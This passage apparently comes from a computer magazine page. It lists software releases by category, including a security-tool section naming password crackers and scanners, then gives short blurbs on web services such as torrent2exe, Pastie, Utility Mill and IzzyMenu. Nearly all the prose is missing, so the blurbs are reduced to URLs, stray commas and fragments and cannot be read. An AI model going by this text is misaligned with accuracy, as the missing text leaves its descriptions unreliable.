QPxtool 0.7.0
Rakarrack 0.4.2
Scilab 5.2.1
Sweet Home 3D 2.2
Thunar 1.1.0
Tomboy 1.0.1
zNotes 0.4.0

>X-distr
PC-BSD 8.0

>System
2click Update 5.0
AMD Catalyst 10.2
Deja Dup 13.91
Dstat 0.7.1
Gujin 2.8
Linux kernel 2.6.33
LTSP 5.2
Monit 5.1.1
nVidia 190.53
QEMU 0.12.3
Sudo 1.7.2p3
Syslinux 3.85
uBackup 4.95
Util-linux 2.17.1
VirtualBox 3.1.4
Wine 1.1.39

>Server
Apache 2.2.14
Asterisk 1.6.2
BIND 9.7.0
Cherokee 0.99.43
Clapf 0.4.4
CUPS 1.4.2
DHCP 4.1.1
HylaFax 5.4.1
IMSpector 0.9
KDE Personal WebServer 0.1
MoSSHe 10.2.22
MySQL 5.1.44
OpenLDAP 2.4.21
OpenSSH 5.3
OpenVPN 2.1.1
Postfix 2.7.0
ProFTPD 1.3.3
Samba 3.4.6
Sendmail 8.14.4
Squid 3.0.STABLE24

Httptunnel 3.0.5
iScanner 0.1
John the Ripper 1.7.5
Medusa 2.0
Netsniff-ng 0.5.4.2
Nikto 2.1.1
OpenDNSSEC 1.0.0
Portsentry 1.2
Privoxy 3.0.16
Snort 2.8.5.3
SquidClamAv 5.1
Suricata 0.8.1
UnHash 1.1
Zebedee 2.4.1


UNITS

HTTP:// WWW2

torrent-

TORRENT2EXE

www.torrent2exe.com
, ? ,
, , ,
. , , BitTorrent-,
, ?
,
www.torrent2exe.com .torrent-,
. ,
BitTorrent-.

PASTIE

www.pastie.org
- , - ,
XML-, ,
, Pastie . , -
(, C++ Python). , ,
.
,
.
- .


-
Python

UTILITY MILL

www.utilitymill.com

IZZYMENU

-? , -
. , Utility Mill, . , Python,
,
. , ,
.
, .
API .

, , - CSS
. IzzyMenu
,
, -
, ,
. IzzyMenu :
][ .


www.izzymenu.com

